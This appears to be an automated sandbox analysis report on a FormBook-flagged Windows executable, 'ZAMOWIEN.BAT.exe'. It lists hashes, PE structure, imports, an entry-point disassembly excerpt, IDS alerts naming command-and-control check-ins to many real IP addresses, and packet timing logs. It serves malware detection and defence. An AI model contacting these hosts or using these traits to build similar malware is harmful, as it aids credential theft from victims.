                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:ZAMOWIEN.BAT.exe
                                                                                File size:974'630 bytes
                                                                                MD5:936fd06cf63ed725bdb6bc4c83bed228
                                                                                SHA1:ce4ec27a6a48dd8be5879bbdaf90cc3bda91a3a5
                                                                                SHA256:c41569f8bec1ed93da1978dbf2d97005a7db32ccb9d526ee17a6c7027fc6fc8c
                                                                                SHA512:8605a5eb9b103219808d3b578b8a7053d89c8ac91228fea591f6fe4e505b3ac5ee6bb8beaa2af6eaed73093191ef7219f61ea15b1efb5d1b9c0ebf1e7742ed45
                                                                                SSDEEP:24576:oewAoAZIk1OhCPilf4anx7eqAtxQUsHVSm:CAFLEmilfb5eqOxQhHs
                                                                                TLSH:9E25C006FB58C787C2EA6E7449F6B7452A3DCBC99CC38B02E54968D8F670F1874C9684
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....
                                                                                Icon Hash:c5cdc989d5cde097
                                                                                Entrypoint:0x403359
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                Instruction
                                                                                sub esp, 000002D4h
                                                                                push ebx
                                                                                push esi
                                                                                push edi
                                                                                push 00000020h
                                                                                pop edi
                                                                                xor ebx, ebx
                                                                                push 00008001h
                                                                                mov dword ptr [esp+14h], ebx
                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                call dword ptr [004080A8h]
                                                                                call dword ptr [004080A4h]
                                                                                and eax, BFFFFFFFh
                                                                                cmp ax, 00000006h
                                                                                mov dword ptr [0042A20Ch], eax
                                                                                je 00007FA459022753h
                                                                                push ebx
                                                                                call 00007FA459025A05h
                                                                                cmp eax, ebx
                                                                                je 00007FA459022749h
                                                                                push 00000C00h
                                                                                call eax
                                                                                mov esi, 004082B0h
                                                                                push esi
                                                                                call 00007FA45902597Fh
                                                                                push esi
                                                                                call dword ptr [00408150h]
                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                cmp byte ptr [esi], 00000000h
                                                                                jne 00007FA45902272Ch
                                                                                push 0000000Ah
                                                                                call 00007FA4590259D8h
                                                                                push 00000008h
                                                                                call 00007FA4590259D1h
                                                                                push 00000006h
                                                                                mov dword ptr [0042A204h], eax
                                                                                call 00007FA4590259C5h
                                                                                cmp eax, ebx
                                                                                je 00007FA459022751h
                                                                                push 0000001Eh
                                                                                call eax
                                                                                test eax, eax
                                                                                je 00007FA459022749h
                                                                                or byte ptr [0042A20Fh], 00000040h
                                                                                push ebp
                                                                                call dword ptr [00408044h]
                                                                                push ebx
                                                                                call dword ptr [004082A0h]
                                                                                mov dword ptr [0042A2D8h], eax
                                                                                push ebx
                                                                                lea eax, dword ptr [esp+34h]
                                                                                push 000002B4h
                                                                                push eax
                                                                                push ebx
                                                                                push 004216A8h
                                                                                call dword ptr [00408188h]
                                                                                push 0040A2C8h
                                                                                Programming Language:
                                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x5ab18.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x62a50x6400f4cff166abb4376522cf86cbd302f644False0.658984375data6.431390019180314IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .ndata0x2b0000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x500000x5ab180x5ac008e289f0503c71e1dae735f54bd537b3dFalse0.3740799328512397data4.762577612489826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x504a80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.35952525372074445
                                                                                RT_ICON0x924d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.3869188453803383
                                                                                RT_ICON0xa2cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.5096473029045643
                                                                                RT_ICON0xa52a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6343808630393997
                                                                                RT_ICON0xa63480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5815565031982942
                                                                                RT_ICON0xa71f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6877049180327869
                                                                                RT_ICON0xa7b780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.723826714801444
                                                                                RT_ICON0xa84200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.6359447004608295
                                                                                RT_ICON0xa8ae80x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.2725609756097561
                                                                                RT_ICON0xa91500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4602601156069364
                                                                                RT_ICON0xa96b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7606382978723404
                                                                                RT_ICON0xa9b200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.34139784946236557
                                                                                RT_ICON0xa9e080x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.39549180327868855
                                                                                RT_ICON0xa9ff00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.44594594594594594
                                                                                RT_DIALOG0xaa1180xb8dataEnglishUnited States0.6467391304347826
                                                                                RT_DIALOG0xaa1d00x144dataEnglishUnited States0.5216049382716049
                                                                                RT_DIALOG0xaa3180x100dataEnglishUnited States0.5234375
                                                                                RT_DIALOG0xaa4180x11cdataEnglishUnited States0.6056338028169014
                                                                                RT_DIALOG0xaa5380x60dataEnglishUnited States0.7291666666666666
                                                                                RT_GROUP_ICON0xaa5980xcadataEnglishUnited States0.5792079207920792
                                                                                RT_VERSION0xaa6680x21cdataEnglishUnited States0.5314814814814814
                                                                                RT_MANIFEST0xaa8880x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5625
                                                                                DLLImport
                                                                                KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049806208.91.197.2780TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974913.248.169.4880TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049807208.91.197.2780TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049808208.91.197.2780TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049756208.91.197.2780TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049755208.91.197.2780TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978913.248.169.4880TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979813.248.169.4880TCP
                                                                                2024-11-25T11:54:45.212490+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049757208.91.197.2780TCP
                                                                                2024-11-25T11:56:55.967429+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049741103.83.194.5080TCP
                                                                                2024-11-25T11:57:26.782948+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049742195.110.124.13380TCP
                                                                                2024-11-25T11:57:42.267241+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049743172.67.145.23480TCP
                                                                                2024-11-25T11:57:44.895063+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049744172.67.145.23480TCP
                                                                                2024-11-25T11:57:47.526021+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049745172.67.145.23480TCP
                                                                                2024-11-25T11:57:50.161110+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049746172.67.145.23480TCP
                                                                                2024-11-25T11:57:55.495788+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974713.248.169.4880TCP
                                                                                2024-11-25T11:57:58.132050+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974813.248.169.4880TCP
                                                                                2024-11-25T11:58:03.411981+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204975013.248.169.4880TCP
                                                                                2024-11-25T11:58:09.222705+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975131.31.196.17780TCP
                                                                                2024-11-25T11:58:11.966222+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975231.31.196.17780TCP
                                                                                2024-11-25T11:58:14.713888+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975331.31.196.17780TCP
                                                                                2024-11-25T11:58:17.449975+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204975431.31.196.17780TCP
                                                                                2024-11-25T11:58:40.408404+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049758208.91.197.2780TCP
                                                                                2024-11-25T11:58:47.583285+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497598.210.46.2180TCP
                                                                                2024-11-25T11:58:50.451907+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497608.210.46.2180TCP
                                                                                2024-11-25T11:58:53.292980+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497618.210.46.2180TCP
                                                                                2024-11-25T11:58:56.102812+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497628.210.46.2180TCP
                                                                                2024-11-25T11:59:01.910298+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049763154.88.22.10580TCP
                                                                                2024-11-25T11:59:04.730265+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049764154.88.22.10580TCP
                                                                                2024-11-25T11:59:07.559152+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049765154.88.22.10580TCP
                                                                                2024-11-25T11:59:10.375169+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049766154.88.22.10580TCP
                                                                                2024-11-25T11:59:16.466040+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976743.155.76.12480TCP
                                                                                2024-11-25T11:59:19.296293+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976843.155.76.12480TCP
                                                                                2024-11-25T11:59:22.149584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976943.155.76.12480TCP
                                                                                2024-11-25T11:59:24.984610+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204977043.155.76.12480TCP
                                                                                2024-11-25T11:59:30.448709+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977166.29.149.4680TCP
                                                                                2024-11-25T11:59:33.126531+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977266.29.149.4680TCP
                                                                                2024-11-25T11:59:35.818839+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977366.29.149.4680TCP
                                                                                2024-11-25T11:59:38.501517+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204977466.29.149.4680TCP
                                                                                2024-11-25T11:59:44.169087+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977581.88.58.21680TCP
                                                                                2024-11-25T11:59:46.886019+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977681.88.58.21680TCP
                                                                                2024-11-25T11:59:49.604023+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977781.88.58.21680TCP
                                                                                2024-11-25T11:59:52.319964+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204977881.88.58.21680TCP
                                                                                2024-11-25T11:59:57.977751+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049779104.21.27.5980TCP
                                                                                2024-11-25T12:00:00.604309+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049780104.21.27.5980TCP
                                                                                2024-11-25T12:00:03.227728+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049781104.21.27.5980TCP
                                                                                2024-11-25T12:00:05.860877+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049782104.21.27.5980TCP
                                                                                2024-11-25T12:00:11.407437+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978345.81.23.2580TCP
                                                                                2024-11-25T12:00:14.114086+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978445.81.23.2580TCP
                                                                                2024-11-25T12:00:16.821997+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978545.81.23.2580TCP
                                                                                2024-11-25T12:00:19.517988+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204978645.81.23.2580TCP
                                                                                2024-11-25T12:00:33.001844+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978713.248.169.4880TCP
                                                                                2024-11-25T12:00:35.628618+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978813.248.169.4880TCP
                                                                                2024-11-25T12:00:40.908404+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204979013.248.169.4880TCP
                                                                                2024-11-25T12:00:57.538289+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049791195.110.124.13380TCP
                                                                                2024-11-25T12:01:03.194457+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049792172.67.145.23480TCP
                                                                                2024-11-25T12:01:05.526905+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049793172.67.145.23480TCP
                                                                                2024-11-25T12:01:08.454141+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049794172.67.145.23480TCP
                                                                                2024-11-25T12:01:10.756632+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049795172.67.145.23480TCP
                                                                                2024-11-25T12:01:15.979446+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979613.248.169.4880TCP
                                                                                2024-11-25T12:01:18.618885+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204979713.248.169.4880TCP
                                                                                2024-11-25T12:01:23.896683+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204979913.248.169.4880TCP
                                                                                2024-11-25T12:01:29.365463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980231.31.196.17780TCP
                                                                                2024-11-25T12:01:32.128405+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980331.31.196.17780TCP
                                                                                2024-11-25T12:01:34.872641+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980431.31.196.17780TCP
                                                                                2024-11-25T12:01:37.597904+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204980531.31.196.17780TCP
                                                                                2024-11-25T12:02:00.202516+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049809208.91.197.2780TCP
                                                                                2024-11-25T12:02:05.820043+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498108.210.46.2180TCP
                                                                                2024-11-25T12:02:08.678892+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498118.210.46.2180TCP
                                                                                2024-11-25T12:02:11.500723+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498128.210.46.2180TCP
                                                                                2024-11-25T12:02:14.324984+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20498138.210.46.2180TCP
                                                                                2024-11-25T12:02:19.956015+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049814154.88.22.10580TCP
                                                                                2024-11-25T12:02:22.779835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049815154.88.22.10580TCP
                                                                                2024-11-25T12:02:25.607019+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049816154.88.22.10580TCP
                                                                                2024-11-25T12:02:28.406599+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049817154.88.22.10580TCP
                                                                                2024-11-25T12:02:34.062658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981843.155.76.12480TCP
                                                                                2024-11-25T12:02:36.902634+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204981943.155.76.12480TCP
                                                                                2024-11-25T12:02:39.750798+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982043.155.76.12480TCP
                                                                                2024-11-25T12:02:42.598122+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204982143.155.76.12480TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 25, 2024 11:56:55.623596907 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.794889927 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.795156002 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.795540094 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.966414928 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967170000 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967226982 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967277050 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967320919 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967365026 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967406034 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967428923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967428923 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967452049 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967488050 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967488050 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967497110 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967541933 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967583895 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:55.967597008 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967597008 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967664003 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967761993 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:55.967762947 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.138942003 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139005899 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139053106 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139097929 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139139891 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139182091 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.139185905 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139182091 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.139230013 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139239073 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.139273882 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139317036 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139360905 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139377117 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.139403105 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139430046 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.139446020 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139488935 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139533043 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139559031 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.139575005 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139619112 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139661074 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139688015 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.139703989 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139748096 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139791012 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.139991999 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.140197039 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311264992 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311326027 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311372042 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311419010 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311464071 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311501026 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311510086 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311554909 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311556101 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311600924 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311621904 CET4974180192.168.11.20103.83.194.50
                                                                                Nov 25, 2024 11:56:56.311645031 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311687946 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311732054 CET8049741103.83.194.50192.168.11.20
                                                                                Nov 25, 2024 11:56:56.311763048 CET4974180192.168.11.20103.83.194.50
